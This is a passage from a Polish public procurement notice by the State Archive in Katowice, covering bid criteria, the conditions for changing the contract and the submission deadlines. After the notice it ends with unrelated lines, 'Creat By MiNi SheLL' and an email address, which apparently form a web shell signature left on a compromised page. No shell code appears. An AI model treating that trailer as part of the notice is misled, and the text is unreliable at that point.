<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - ilość prób mikrobiologicznych zdezynfekowanego zasobu - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z brzmieniem przepisu art. 144 ust. 1 ustawy Prawo zamówień publicznych zakazuje się istotnych zmian postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany. W wykonaniu powyższej dyspozycji Zamawiający poniżej przewiduje w treści SIWZ możliwości dokonania zmiany postanowień umowy w sprawie zamówienia publicznego w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1 	Zmiana terminu wykonania umowy: 
1.1 	wystąpienie okoliczności siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą Stron, występujące po podpisaniu umowy o wykonanie zamówienia publicznego, a powodujące niemożliwość wywiązania się przez jedną lub obie Strony z postanowień umowy w jej obecnym brzmieniu, w ustalonym umową pierwotnym terminie, a którym strona nie będzie mogła zapobiec nawet przy zastosowaniu należytej staranności, jak np. pożar, powódź, trzęsienie ziemi, strajk generalny (z wyjątkiem strajków w przedsiębiorstwach Stron i podwykonawców) wojna, mobilizacja, działania wojenne wroga, ataki terrorystyczne, embargo lub zarządzenia władz;
1.2 gdy zmienią się - związane z planowanym przemieszczeniem zasobu do nowego obiektu warunki techniczne lub prawne (np. opóźnienia w przekazaniu nowego obiektu do użytkowania, niewykonanie w zakładanych terminach instalacji i wyposażenia w nowym obiekcie lub nieprzekazaniu go do użytkowania, nie pozwolą na planowane składowanie w nim materiałów archiwalnych)
2 	Zmiany technologiczne: 
2.1 pojawienie się na rynku materiałów lub urządzeń nowej generacji albo nowych technologii wykonania przedmiotu zamówienia, korzystnych dla Zamawiającego, pozwalających na zaoszczędzenie kosztów realizacji przedmiotu zamówienia lub kosztów eksploatacji wykonanego przedmiotu zamówienia, w szczególności poprawa jakości lub innych parametrów charakterystycznych dla przedmiotu zamówienia publicznego;
2.2 konieczność zrealizowania przedmiotu zamówienia publicznego przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w SIWZ w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem umowy w sprawie zamówienia publicznego; 
2.3	konieczność zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
3 	Zmiany osobowe: 
3.1	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w SIWZ w pkt. 5.1.3.3, zmiana osób wskazanych do sprawowania nadzoru na usługami objętymi zamówieniem publicznym, jak również inne zmiany osobowe ze strony Zamawiającego lub Wykonawcy - w szczególności ze względu na skutek zdarzeń losowych, zmian kadrowo - personalnych, utraty wymaganych uprawnień,
3.2 	zmiana Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy na innego Podwykonawcę, dysponującego co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym co uprzedni Podwykonawca; 
3.3 	rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się Podwykonawcą doprowadzi do skrócenia terminu wykonania zamówienia, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu zamówienia bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SIWZ.
4 	Pozostałe zmiany: 
4.1 	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy w sprawie zamówienia publicznego oraz w konsekwencji zmniejszenie ceny kontraktowej objętej ofertą Wykonawcy, która została uznana za najkorzystniejszą, w przypadku wstrzymania lub ograniczenia finansowania zamówienia publicznego lub w przypadku wystąpienia po stronie Zamawiającego innych okoliczności, o których mowa w pkt. 4.2 poniżej; w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie stosownie pomniejszone przy czym Zamawiający zapłaci za wszystkie spełnione należycie przez Wykonawcę świadczenia; 
4.2 	inne niż wymieniona w pkt. 1.1 powyżej siła wyższa zdarzenie zewnętrzne, niemożliwe do przewidzenia i do zapobieżenia uniemożliwiające wykonanie przedmiotu umowy zgodnie z SIWZ oraz umową zawartą w sprawie zamówienia publicznego;
4.3 	wydłużenie terminu gwarancji w związku z przedłużeniem terminu realizacji zamówienia lub  zadeklarowaniem dłuższego terminu gwarancji przez podmiot udzielający gwarancji inny niż Wykonawca;
4.4	zmiany wysokości należnego podatku od towarów i usług VAT na skutek zmian w bezwzględnie obowiązujących przepisach prawa,
4.5 	obniżenie wysokości wynagrodzenia na skutek wadliwego wykonania przez Wykonawcę przedmiotu zamówienia publicznego,
4.6 	inna niż przewidziane w punktach powyżej - zamian umowy korzystna dla Zamawiającego, w szczególności, acz nie wyłącznie, w zakresie dokonywania płatności.

6	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego) oraz zmiany oznaczeń Stron, w tym firmy, zmiany adresu, siedziby, danych teleadresowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ap.gov.pl/katowice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ARCHIWUM PAŃSTWOWE W KATOWICACH 
ul. Józefowska 104
40 - 145 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2015 godzina 10:00, miejsce: ARCHIWUM PAŃSTWOWE W KATOWICACH 
ul. Józefowska 104
40 - 145 Katowice
Sekretariat pokój nr 107 Budynek nr I.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com